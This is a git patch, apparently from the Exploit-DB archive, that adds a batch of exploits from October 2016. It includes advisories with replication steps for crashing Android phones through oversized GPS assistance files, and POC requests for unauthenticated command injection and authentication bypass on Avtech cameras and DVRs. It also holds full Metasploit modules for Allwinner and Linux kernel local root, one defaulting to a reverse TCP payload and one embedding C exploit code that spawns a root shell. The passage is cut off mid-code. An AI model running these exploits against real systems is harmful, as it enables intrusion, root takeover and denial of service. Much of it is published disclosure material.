From f8b17d14a142c75c1542dbfb1d529baba29237f3 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 12 Oct 2016 05:01:17 +0000 Subject: [PATCH] DB: 2016-10-12 12 new exploits Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation Spacemarc News - Cross-Site Request Forgery (Add New Post) Minecraft Launcher - Insecure File Permissions Privilege Escalation BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery sheed AntiVirus - Unquoted Service Path Privilege Escalation AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection Android - 'gpsOneXtra' Data Files Denial of Service Linux Kernel 3.13.1 - Recvmmsg Privilege Escalation (Metasploit) Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit) ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author) --- files.csv | 14 +- platforms/android/dos/40502.txt | 234 ++++++++++++++++++++ platforms/android/local/40504.rb | 83 +++++++ platforms/cgi/webapps/40500.txt | 218 ++++++++++++++++++ platforms/linux/local/40503.rb | 354 ++++++++++++++++++++++++++++++ platforms/php/webapps/40493.html | 94 ++++++++ platforms/php/webapps/40495.html | 38 ++++ platforms/php/webapps/40496.html | 83 +++++++ platforms/php/webapps/40505.txt | 26 +++ platforms/php/webapps/40506.html | 155 +++++++++++++ platforms/windows/local/40494.txt | 29 +++ platforms/windows/local/40497.txt | 29 +++ platforms/xml/webapps/40501.txt | 140 ++++++++++++ 13 files changed, 1496 insertions(+), 1 deletion(-) create mode 100755 platforms/android/dos/40502.txt create mode 100755 platforms/android/local/40504.rb create mode 100755 platforms/cgi/webapps/40500.txt create mode 100755 platforms/linux/local/40503.rb create mode 100755 platforms/php/webapps/40493.html create mode 100755 platforms/php/webapps/40495.html create mode 100755 platforms/php/webapps/40496.html create mode 100755 platforms/php/webapps/40505.txt create mode 100755 platforms/php/webapps/40506.html create mode 100755 platforms/windows/local/40494.txt create mode 100755 platforms/windows/local/40497.txt create mode 100755 platforms/xml/webapps/40501.txt diff --git a/files.csv b/files.csv index cde6f0e23..140ab3f46 100755 --- a/files.csv +++ b/files.csv @@ -36606,7 +36606,19 @@ id,file,description,date,author,platform,type,port 40486,platforms/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps,0 40487,platforms/php/webapps/40487.txt,"PHP Press Release - Stored Cross Site Scripting",2016-10-09,Besim,php,webapps,0 40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0 -40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0 +40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0 40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0 40491,platforms/multiple/remote/40491.py,"HP Client - Automation Command Injection / Remote Code Execution",2016-10-10,SlidingWindow,multiple,remote,0 40492,platforms/php/webapps/40492.html,"Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0 +40493,platforms/php/webapps/40493.html,"Spacemarc News - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0 +40494,platforms/windows/local/40494.txt,"Minecraft Launcher - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0 +40495,platforms/php/webapps/40495.html,"BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery",2016-10-11,Besim,php,webapps,80 +40496,platforms/php/webapps/40496.html,"phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery",2016-10-11,Besim,php,webapps,80 +40497,platforms/windows/local/40497.txt,"sheed AntiVirus - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local,0 +40500,platforms/cgi/webapps/40500.txt,"AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities",2016-10-11,"Gergely Eberhardt",cgi,webapps,80 +40501,platforms/xml/webapps/40501.txt,"RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection",2016-10-11,"SEC Consult",xml,webapps,0 +40502,platforms/android/dos/40502.txt,"Android - 'gpsOneXtra' Data Files Denial of Service",2016-10-11,"Nightwatch Cybersecurity Research",android,dos,0 +40503,platforms/linux/local/40503.rb,"Linux Kernel 3.13.1 - Recvmmsg Privilege Escalation (Metasploit)",2016-10-11,Metasploit,linux,local,0 +40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0 +40505,platforms/php/webapps/40505.txt,"ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting",2016-10-11,Besim,php,webapps,0 +40506,platforms/php/webapps/40506.html,"ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)",2016-10-11,Besim,php,webapps,0 diff --git a/platforms/android/dos/40502.txt b/platforms/android/dos/40502.txt new file mode 100755 index 000000000..85850df0e --- /dev/null +++ b/platforms/android/dos/40502.txt @@ -0,0 +1,234 @@ +Original at: +https://wwws.nightwatchcybersecurity.com/2016/10/04/advisory-cve-2016-5348-2/ + +Summary + +Android devices can be crashed remotely forcing a halt and then a soft +reboot by a MITM attacker manipulating assisted GPS/GNSS data provided +by Qualcomm. This issue affects the open source code in AOSP and +proprietary code in a Java XTRA downloader provided by Qualcomm. The +Android issue was fixed by in the October 2016 Android bulletin. +Additional patches have been issued by Qualcomm to the proprietary +client in September of 2016. This issue may also affect other +platforms that use Qualcomm GPS chipsets and consume these files but +that has not been tested by us, and requires further research. + +Background – GPS and gpsOneXtra + +Most mobile devices today include ability to locate themselves on the +Earth’s surface by using the Global Positioning System (GPS), a system +originally developed and currently maintained by the US military. +Similar systems developed and maintained by other countries exist as +well including Russia’s GLONASS, Europe’s Galileo, and China’s Beidou. +The GPS signals include an almanac which lists orbit and status +information for each of the satellites in the GPS constellation. This +allows the receivers to acquire the satellites quicker since the +receiver would not need to search blindly for the location of each +satellite. Similar functionality exists for other GNSS systems. In +order to solve the problem of almanac acquisition, Qualcomm developed +the gpsOneXtra system in 2007 (also known as IZat XTRA Assistance +since 2013). This system provides ability to GPS receivers to download +the almanac data over the Internet from Qualcomm-operated servers. The +format of these XTRA files is proprietary but seems to contain current +satellite location data plus estimated locations for the next 7 days, +as well as additional information to improve signal acquisition. Most +Qualcomm mobile chipsets and GPS chips include support for this +technology. A related Qualcomm technology called IZat adds ability to +use WiFi and cellular networks for locations in addition to GPS. + +Background – Android and gpsOneXtra Data Files + +During our network monitoring of traffic originating from an Android +test device, we discovered that the device makes periodic calls to the +Qualcomm servers to retrieve gpsOneXtra assistance files. These +requests were performed almost every time the device connected to a +WiFi network. As discovered by our research and confirmed by the +Android source code, the following URLs were used: + +http://xtra1.gpsonextra.net/xtra.bin +http://xtra2.gpsonextra.net/xtra.bin +http://xtra3.gpsonextra.net/xtra.bin + +http://xtrapath1.izatcloud.net/xtra2.bin +http://xtrapath2.izatcloud.net/xtra2.bin +http://xtrapath3.izatcloud.net/xtra2.bin + +WHOIS record show that both domains – gpsonextra.net and izatcloud.net +are owned by Qualcomm. Further inspection of those URLs indicate that +both domains are being hosted and served from Amazon’s Cloudfront CDN +service (with the exception of xtra1.gpsonextra.net which is being +served directly by Qualcomm). On the Android platform, our inspection +of the Android source code shows that the file is requested by an +OS-level Java process (GpsXtraDownloader.java), which passes the data +to a C++ JNI class +(com_android_server_location_GnssLocationProvider.cpp), which then +injects the files into the Qualcomm modem or firmware. We have not +inspected other platforms in detail, but suspect that a similar +process is used. Our testing was performed on Android v6.0, patch +level of January 2016, on a Motorola Moto G (2nd gen) GSM phone, and +confirmed on a Nexus 6P running Android v6.01, with May 2016 security +patches. Qualcomm has additionally performed testing on their +proprietary Java XTRA downloader client confirming this vulnerability. + +Vulnerability Details + +Android platform downloads XTRA data files automatically when +connecting to a new network. This originates from a Java class +(GpsXtraDownloader.java), which then passes the file to a C++/JNI +class (com_android_server_location_GnssLocationProvider.cpp) and then +injects it into the Qualcomm modem. + +The vulnerability is that both the Java and the C++ code do not check +how large the data file actually is. If a file is served that is +larger than the memory available on the device, this results in all +memory being exhausted and the phone halting and then soft rebooting. +The soft reboot was sufficient to recover from the crash and no data +was lost. While we have not been able to achieve remote code execution +in either the Qualcomm modem or in the Android OS, this code path can +potentially be exploited for such attacks and would require more +research. + +To attack, an MITM attacker located anywhere on the network between +the phone being attacked and Qualcomm’s servers can initiate this +attack by intercepting the legitimate requests from the phone, and +substituting their own, larger files. Because the default Chrome +browser on Android reveals the model and build of the phone (as we +have written about earlier), it would be possible to derive the +maximum memory size from that information and deliver the +appropriately sized attack file. Possible attackers can be hostile +hotspots, hacked routers, or anywhere along the backbone. This is +somewhat mitigated by the fact that the attack file would need to be +as large as the memory on the phone. + +The vulnerable code resides here – (GpsXtraDownloader.java, lines 120-127): + +connection.connect() +int statusCode = connection.getResponseCode(); +if (statusCode != HttpURLConnection.HTTP_OK) { +if (DEBUG) Log.d(TAG, “HTTP error downloading gps XTRA: “ + statusCode); +return null; +} +return Streams.readFully(connection.getInputStream()); + +Specifically, the affected code is using Streams.readFully to read the +entire file into memory without any kind of checks on how big the file +actually is. + +Additional vulnerable code is also in the C++ layer – +(com_android_server_location_GnssLocationProvider.cpp, lines 856-858): + +jbyte* bytes = (jbyte *)env->GetPrimitiveArrayCritical(data, 0); +sGpsXtraInterface->inject_xtra_data((char *)bytes, length); +env->ReleasePrimitiveArrayCritical(data, bytes, JNI_ABORT); + +Once again, no size checking is done. We were able to consistently +crash several different Android phones via a local WiFi network with +the following error message: + +java.lang.OutOfMemoryError: Failed to allocate a 478173740 byte +allocation with 16777216 free bytes and 252MB until OOM +at java.io.ByteArrayOutputStream.expand(ByteArrayOutputStream.java:91) + +(It should be noted that we were not able to consistently and reliable +achieve a crash in the C++/JNI layer or the Qualcomm modem itself) + +Steps To Replicate (on Ubuntu 16.04) +1. Install DNSMASQ: +sudo apt-get install dnsmasq + +2. Install NGINX: +sudo apt-get install nginx + +3. Modify the /etc/hosts file to add the following entries to map to +the IP of the local computer (varies by vendor of the phone): +192.168.1.x xtra1.gpsonextra.net +192.168.1.x xtra2.gpsonextra.net +192.168.1.x xtra3.gpsonextra.net +192.168.1.x xtrapath1.izatcloud.net +192.168.1.x xtrapath2.izatcloud.net +192.168.1.x xtrapath3.izatcloud.net + +4. Configure /etc/dnsmasq.conf file to listed on the IP: +listen-address=192.168.1.x + +5. Restart DNSMASQ: +sudo /etc/init.d/dnsmasq restart + +6. Use fallocate to create the bin files in “/var/www/html/” +sudo fallocate -s 2.5G xtra.bin +sudo fallocate -s 2.5G xtra2.bin +sudo fallocate -s 2.5G xtra3.bin + +7. Modify the settings on the Android test phone to static, set DNS to +point to “192.168.1.x”. AT THIS POINT – Android will resolve DNS +against the local computer, and serve the GPS files from it. + +To trigger the GPS download, disable WiFi and enable Wifi, or +enable/disable Airplane mode. Once the phone starts downloading the +files, the screen will go black and it will reboot. + +PLEASE NOTE: on some models, the XTRA file is cached and not retrieved +on every network connect. For those models, you may need to reboot the +phone and/or follow the injection commands as described here. You can +also use an app like GPS Status and ToolboxGPS Status and Toolbox. + +The fix would be to check for file sizes in both Java and native C++ code. + +Mitigation Steps + +For the Android platform, users should apply the October 2016 Android +security bulletin and any patches provided by Qualcomm. Please note +that as per Qualcomm, the patches for this bug only include fixes to +the Android Open Source Project (AOSP) and the Qualcomm Java XTRA +downloader clients. Apple and Microsoft have indicated to us via email +that GPS-capable devices manufactured by them including iPad, iPhones, +etc. and Microsoft Surface and Windows Phone devices are not affected +by this bug. Blackberry devices powered by Android are affected but +the Blackberry 10 platform is not affected by this bug. For other +platforms, vendors should follow guidance provided by Qualcomm +directly via an OEM bulletin. + +Bounty Information + +This bug has fulfilled the requirements for Google’s Android Security +Rewards and a bounty has been paid. + +References + +Android security bulletin: October 2016 +CERT/CC tracking: VR-179 +CVE-ID: CVE-2016-5348 +Google: Android bug # 213747 / AndroidID-29555864 + +CVE Information + +As provided by Qualcomm: + +CVE: CVE-2016-5348 +Access Vector: Network +Security Risk: High +Vulnerability: CWE-400: Uncontrolled Resource Consumption (‘Resource +Exhaustion’) +Description: When downloading a very large assistance data file, the +client may crash due to out of memory error. +Change summary: + +check download size ContentLength before downloading data +catch OOM exception + +Credits + +We would like to thank CERT/CC for helping to coordinate this process, +and all of the vendors involved for helpful comments and a quick +turnaround. This bug was discovered by Yakov Shafranovich, and the +advisory was also written by Yakov Shafranovich. + +Timeline + +201606-20: Android bug report filed with Google +2016-06-21: Android bug confirmed +2016-06-21: Bug also reported to Qualcomm and CERT. +2016-09-14: Coordination with Qualcomm on public disclosure +2016-09-15: Coordination with Google on public disclosure +2016-10-03: Android security bulletin released with fix +2016-10-04: Public disclosure \ No newline at end of file diff --git a/platforms/android/local/40504.rb b/platforms/android/local/40504.rb new file mode 100755 index 000000000..b91127948 --- /dev/null +++ b/platforms/android/local/40504.rb @@ -0,0 +1,83 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require "msf/core" + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + "Name" => "Allwinner 3.4 Legacy Kernel Local Privilege Escalation", + "Description" => %q{ + This module attempts to exploit a debug backdoor privilege escalation in + Allwinner SoC based devices. + Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4 + Vulnerable OS: all OS images available for Orange Pis, + any for FriendlyARM's NanoPi M1, + SinoVoip's M2+ and M3, + Cuebietech's Cubietruck + + Linksprite's pcDuino8 Uno + Exploitation may be possible against Dragon (x10) and Allwinner Android tablets + }, + "License" => MSF_LICENSE, + "Author" => + [ + "h00die ", # Module + "KotCzarny" # Discovery + ], + "Platform" => [ "android", "linux" ], + "DisclosureDate" => "Apr 30 2016", + "DefaultOptions" => { + "payload" => "linux/armle/mettle/reverse_tcp" + }, + "Privileged" => true, + "Arch" => ARCH_ARMLE, + "References" => + [ + [ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"], + [ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:" \ + "https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"], + [ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"] + ], + "SessionTypes" => [ "shell", "meterpreter" ], + 'Targets' => + [ + [ 'Auto', { } ] + ], + 'DefaultTarget' => 0, + )) + end + + def check + backdoor = '/proc/sunxi_debug/sunxi_debug' + if file_exist?(backdoor) + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def exploit + backdoor = '/proc/sunxi_debug/sunxi_debug' + if file_exist?(backdoor) + pl = generate_payload_exe + + exe_file = "/tmp/#{rand_text_alpha(5)}.elf" + vprint_good "Backdoor Found, writing payload to #{exe_file}" + write_file(exe_file, pl) + cmd_exec("chmod +x #{exe_file}") + + vprint_good 'Escalating' + cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}") + else + print_error "Backdoor #{backdoor} not found." + end + end +end \ No newline at end of file diff --git a/platforms/cgi/webapps/40500.txt b/platforms/cgi/webapps/40500.txt new file mode 100755 index 000000000..670a6c403 --- /dev/null +++ b/platforms/cgi/webapps/40500.txt @@ -0,0 +1,218 @@ +Avtech devices multiple vulnerabilities +-------------------------------------------------- + +Platforms / Firmware confirmed affected: +- Every Avtech device (IP camera, NVR, DVR) and firmware version. [4] +contains the list of confirmed firmware versions, which are affected. +- Product page: http://www.avtech.com.tw/ + +ôAVTECH, founded in 1996, is one of the worldÆs leading CCTV +manufacturers. With stably increasing revenue and practical business +running philosophy, AVTECH has been ranked as the largest public-listed +company among the Taiwan surveillance industry. AVTECH makes every +effort on the innovation of technology, product and implementation. +Based on years of research and industry experience, AVTECH has obtained +a leading position on mobile platform support and provides a full range +of surveillance products.ö + +Avtech is the second most popular search term in Shodan. According to +Shodan, more than 130.000 Avtech devices are exposed to the internet. + +Vulnerabilities +--------------- +1) Plaintext storage of administrative password +Every user password is stored in clear text. An attacker with access to +the device itself can easily obtain the full list of passwords. By +exploiting command injection or authentication bypass issues, the clear +text admin password can be retrieved. + +2) Missing CSRF protection +The web interface does not use any CSRF protection. If a valid session +exists for the user, the attacker can modify all settings of the device +via CSRF. If there is no valid session, but the user did not change the +default admin password, the attacker can log in as admin via CSRF as well. + +3) Unauthenticated information disclosure +Under the /cgi-bin/nobody folder every CGI script can be accessed +without authentication. +POC: GET /cgi-bin/nobody/Machine.cgi?action=get_capability +Example response: +Firmware.Version=1011-1005-1008-1002 +MACAddress=00:0E:53:xx:xx:xx +Product.Type=DVR +Product.ID=308B +Product.ShortName=V_full_Indep,V_Multistream +Video.System=PAL +Audio.DownloadFormat=ULAW +Video.Input.Num=8 +Video.Output.Num=1 +Video.Format=H264,MJPEG +Video.Format.Default=H264 +Video.Resolution=4CIF,CIF +Video.Quality=BEST,HIGH,NORMAL,BASIC +Video.Local.Input.Num=8 +Video.Local.Output.Num=1 +Video.Local.Format=H264,MJPEG +Audio.Input.Num=8 +Audio.Output.Num=1 +Audio.Format=ULAW +Audio.Local.Input.Num=8 +Audio.Local.Output.Num=1 +Audio.Local.Format=PCM +Language.Default=ENGLISH +Language.Support=ENGLISH&CHINESE&JAPANESE&FRANCE&GERMAN&SPANISH&PORTUGUESE&ITALIAN&TURKISH&POLISH&RUSSIAN&CUSTOMIZE&THAI +&VIETNAM&DUTCH&GREEK&ARABIC&CZECH&HUNGARIAN&HEBREW&CHINA& +Capability=D0,80,A,80 +PushNotify.MaxChannel=8 + +4) Unauthenticated SSRF in DVR devices +In case of DVR devices, Search.cgi can be accessed without +authentication. This service is responsible for searching and accessing +IP cameras in the local network. In newer firmware versions, Search.cgi +provides the cgi_query action, which performs an HTTP request with the +specified parameters. By modifying the ip, port and queryb64str +parameters, an attacker is able to perform arbitrary HTTP requests +through the DVR device without authentication. +POC: +http:///cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw== + +5) Unauthenticated command injection in DVR devices +The cgi_query action in Search.cgi performs HTML requests with the wget +system command, which uses the received parameters without sanitization +or verification. By exploiting this issue, an attacker can execute any +system command with root privileges without authentication. +POC: +http:///cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$(ps|grep%20Search.cgi|grep%20-v%20grep|head%20-n%201|awk%20'{print%20"/tmp/"$1".log"}');&password=admin + +6) Authentication bypass #1 +Video player plugins are stored as .cab files in the web root, which can +be accessed and downloaded without authentication. The cab file request +verification in the streamd web server is performed with the strstr +function, which means that a request should not be authenticated if it +contains the ô.cabö string anywhere in the URL. We note that some of the +models contain an additional check in the CgiDaemon, which allows +unauthenticated cgi access only under the /cgi-bin/nobody folder. +POC: +http:///cgi-bin/user/Config.cgi?.cab&action=get&category=Account.* + +7) Authentication bypass #2 +Cgi scripts in the /cgi-bin/nobody folder can be accessed without +authentication (e.g. for login). The streamd web server verifies whether +the request can be performed without authentication by searching for the +ô/nobodyö string in the URL with the strstr function. Thus, if a +request contains the "/nobody" string anywhere in the URL, it does not +have to be authenticated. We note that some of the models contain an +additional check in the CgiDaemon, which allows unauthenticated cgi +access only under the /cgi-bin/nobody folder. +POC: +http:///cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.* + +8) Unauthenticated file download from web root +If a cab file is requested, the web server sends the file without +processing it. Because the streamd web server verifies the cab file +request by searching for the ô.cabö string in the URL with the strstr +function, any file (even the cgi scripts) in the web root can be +downloaded without authentication. +POC: http:///cgi-bin/cgibox?.cab + +9) Login captcha bypass #1 +To prevent brute-forcing attempts, Avtech devices require a captcha for +login requests. However, if the login requests contain the login=quick +parameter, the captcha verification is bypassed. +POC: +http:///cgi-bin/nobody/VerifyCode.cgi?account=&login=quick + +10) Login captcha bypass #2 +Instead of using a random session ID, Avtech devices use the +base64-encoded username and password as the Cookie value. Since the IP +address of the logged in user is not stored, if an attacker sets the +Cookie manually, the captcha verification can by bypassed easily. + +11) Authenticated command injection in CloudSetup.cgi +Devices that support the Avtech cloud contain CloudSetup.cgi, which can +be accessed after authentication. The exefile parameter of a +CloudSetup.cgi request specifies the system command to be executed. +Since there is no verification or white list-based checking of the +exefile parameter, an attacker can execute arbitrary system commands +with root privileges. +POC: http:///cgi-bin/supervisor/CloudSetup.cgi?exefile=ps + +12) Authenticated command injection in adcommand.cgi +Some of the Avtech devices contain adcommand.cgi to perform ActionD +commands. The adcommand.cgi can be accessed after authentication. In +newer devices the ActionD daemon provides the DoShellCmd function, which +performs a system call with the specified parameters. Since there is no +verification or white list-based checking of the parameter of the +DoShellCmd function, an attacker can execute arbitrary system commands +with root privileges. +POC: +POST /cgi-bin/supervisor/adcommand.cgi HTTP/1.1 +Host: +Content-Length: 23 +Cookie: SSID=YWRtaW46YWRtaW4= + +DoShellCmd "strCmd=ps&" + +13) Authenticated command injection in PwdGrp.cgi +The PwdGrp.cgi uses the username, password and group parameters in a new +user creation or modification request in a system command without +validation or sanitization. Thus and attacker can execute arbitrary +system commands with root privileges. +We are aware that this vulnerability is being exploited in the wild! +POC: +http:///cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;reboot;&grp=SUPERVISOR&lifetime=5%20MIN + +14) HTTPS used without certificate verification +The SyncCloudAccount.sh, QueryFromClient.sh and SyncPermit.sh scripts +use wget to access HTTPS sites, such as https://payment.eagleeyes.tw, by +specifying the no-check-certificate parameter. Thus wget skips server +certificate verification and a MITM attack is possible against the HTTPS +communication. + +Timeline +2015.10.19: First attempt to contact with Avtech, but we did not receive +any response +2016.05.24: Second attempt to contact Avtech without any response +2016.05.27: Third attempt to contact Avtech by sending e-mail to public +Avtech e-mail addresses. We did not receive any response. +2016.xx.xx: Full disclosure + +POC +--- +POC script is available to demonstrate the following problems [3]: +- Unauthenticated information leakage (capabilities) +- Authentication bypass (.cab, nobody) +- Unauthenticated SSRF on DVR devices +- Unauthenticated command injection on DVR devices +- Login captcha bypass with login=quick or manual cookie creation +- CloudSetup.cgi command injection after authentication +- adcommand.cgi command injection after authentication + +A video demonstration is also available [1], which presents some of the +above problems. + +Recommendations +--------------- +Unfortunately there is no solution available for these vulnerabilities +at the moment. You can take the following steps to protect your device: +- Change the default admin password +- Never expose the web interface of any Avtech device to the internet + +We note that the above vulnerabilities were found within a short period +of time without a systematic approach. Based on the vulnerability types +we found and the overall code quality, the devices should contain much +more problems. + +Credits +------- +This vulnerability was discovered and researched by Gergely Eberhardt +(@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu) + +References +---------- +[1] +https://www.search-lab.hu/advisories/126-avtech-devices-multiple-vulnerabilities + +[2] https://youtu.be/BUx8nLlIMxI +[3] https://github.com/ebux/AVTECH +[4] http://www.search-lab.hu/media/vulnerability_matrix.txt diff --git a/platforms/linux/local/40503.rb b/platforms/linux/local/40503.rb new file mode 100755 index 000000000..5bc558e17 --- /dev/null +++ b/platforms/linux/local/40503.rb @@ -0,0 +1,354 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require "msf/core" + +class MetasploitModule < Msf::Exploit::Local + Rank = GoodRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Linux Kernel 3.13.1 Recvmmsg Privilege Escalation', + 'Description' => %q{ + This module attempts to exploit CVE-2014-0038, by sending a recvmmsg + system call with a crafted timeout pointer parameter to gain root. + This exploit has offsets for 3 Ubuntu 13 kernels built in: + 3.8.0-19-generic (13.04 default) + 3.11.0-12-generic (13.10 default) + 3.11.0-15-generic (13.10) + This exploit may take up to 13 minutes to run due to a decrementing (1/sec) + pointer which starts at 0xff*3 (765 seconds) + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'h00die ', # Module + 'rebel' # Discovery + ], + 'DisclosureDate' => 'Feb 2 2014', + 'Platform' => [ 'linux'], + 'Arch' => [ ARCH_X86, ARCH_X86_64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => + [ + [ 'Auto', { } ] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => { 'WfsDelay' => 780, 'PrependFork' => true, }, + 'References' => + [ + [ 'EDB', '31347'], + [ 'EDB', '31346'], + [ 'CVE', '2014-0038'], + [ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1453900'] + ] + )) + register_options( + [ + OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]), + OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]) + ], self.class) + end + + def check + def kernel_vuln?() + os_id = cmd_exec('grep ^ID= /etc/os-release') + if os_id == 'ID=ubuntu' + kernel = Gem::Version.new(cmd_exec('/bin/uname -r')) + case kernel.release.to_s + when '3.11.0' + if kernel == Gem::Version.new('3.11.0-15-generic') || kernel == Gem::Version.new('3.11.0-12-generic') + vprint_good("Kernel #{kernel} is exploitable") + return true + else + print_error("Kernel #{kernel} is NOT vulnerable or NOT exploitable") + return false + end + when '3.8.0' + if kernel == Gem::Version.new('3.8.0-19-generic') + vprint_good("Kernel #{kernel} is exploitable") + return true + else + print_error("Kernel #{kernel} is NOT vulnerable or NOT exploitable") + return false + end + else + print_error("Non-vuln kernel #{kernel}") + return false + end + else + print_error("Unknown OS: #{os_id}") + return false + end + end + + if kernel_vuln?() + return CheckCode::Appears + else + return CheckCode::Safe + end + end + + def exploit + + if check != CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') + end + + + # direct copy of code from exploit-db. I removed a lot of the comments in the title area just to cut down on size + + recvmmsg = %q{ + /* + *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* + recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y) + CVE-2014-0038 / x32 ABI with recvmmsg + by rebel @ irc.smashthestack.org + ----------------------------------- + */ + + #define _GNU_SOURCE + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + + #define __X32_SYSCALL_BIT 0x40000000 + #undef __NR_recvmmsg + #define __NR_recvmmsg (__X32_SYSCALL_BIT + 537) + #define VLEN 1 + #define BUFSIZE 200 + + int port; + + struct offset { + char *kernel_version; + unsigned long dest; // net_sysctl_root + 96 + unsigned long original_value; // net_ctl_permissions + unsigned long prepare_kernel_cred; + unsigned long commit_creds; + }; + + struct offset offsets[] = { + {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10 + {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10 + {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04 + {NULL,0,0,0,0} + }; + + void udp(int b) { + int sockfd; + struct sockaddr_in servaddr,cliaddr; + int s = 0xff+1; + + if(fork() == 0) { + while(s > 0) { + fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s)); + sleep(1); + s--; + fprintf(stderr,"."); + } + + sockfd = socket(AF_INET,SOCK_DGRAM,0); + bzero(&servaddr,sizeof(servaddr)); + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK); + servaddr.sin_port=htons(port); + sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr)); + exit(0); + } + + } + + void trigger() { + open("/proc/sys/net/core/somaxconn",O_RDONLY); + + if(getuid() != 0) { + fprintf(stderr,"not root, ya blew it!\n"); + exit(-1); + } + + fprintf(stderr,"w00p w00p!\n"); + system("/bin/sh -i"); + } + + typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); + typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); + _commit_creds commit_creds; + _prepare_kernel_cred prepare_kernel_cred; + + // thx bliss + static int __attribute__((regparm(3))) + getroot(void *head, void * table) + { + commit_creds(prepare_kernel_cred(0)); + return -1; + } + + void __attribute__((regparm(3))) + trampoline() + { + asm("mov $getroot, %rax; call *%rax;"); + } + + int main(void) + { + int sockfd, retval, i; + struct sockaddr_in sa; + struct mmsghdr msgs[VLEN]; + struct iovec iovecs[VLEN]; + char buf[BUFSIZE]; + long mmapped; + struct utsname u; + struct offset *off = NULL; + + uname(&u); + + for(i=0;offsets[i].kernel_version != 